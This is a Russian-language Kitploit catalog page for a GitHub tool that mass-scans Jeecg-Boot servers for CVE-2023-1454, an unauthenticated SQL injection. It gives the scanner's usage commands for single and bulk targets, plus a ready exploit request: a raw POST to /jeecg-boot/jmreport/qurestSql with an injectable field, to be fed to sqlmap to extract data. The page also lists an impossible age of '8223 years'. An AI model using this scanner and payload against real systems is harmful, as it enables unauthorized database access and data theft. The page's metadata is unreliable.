Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/padbergpete47/cve-2023-1454
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubpadbergpete47/cve-2023-1454

CVE-2023-1454

CVE-2023-1454, SQL-инъекция на фронтенде Jeecg-Boot, массовое обнаружение CVE-2023-1454

Репозиторий
8223 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-1454

jmreport/qurestSql неавторизованное массовое сканирование SQL-инъекций poc Jeecg-Boot — это быстрая платформа разработки на основе Spring Boot и Jeecg-Boot-Plus. В последней версии jeecg-boot 3.5.0 были обнаружены множественные уязвимости SQL-инъекций.

Описание

Оригинальный инструмент

Оригинальный инструмент имел высокую частоту ложных срабатываний, поэтому были изменены условия проверки и попутно оптимизирован код.

Использование инструмента

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 тест одного URL

python3 CVE-2023-1454-scan.py -f url.txt массовое сканирование

После завершения сканирования в текущей директории будет создан файл vuln.txt с URL-адресами, содержащими уязвимости.

poc:

exp:

Сохраните пакет данных в формате txt, затем с помощью sqlmap можно получить данные.

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

Отказ от ответственности

Любые прямые или косвенные последствия и убытки, возникшие в результате распространения или использования информации, предоставленной в данном документе, несет сам пользователь. Автор не несет за это никакой ответственности.

Скачать инструмент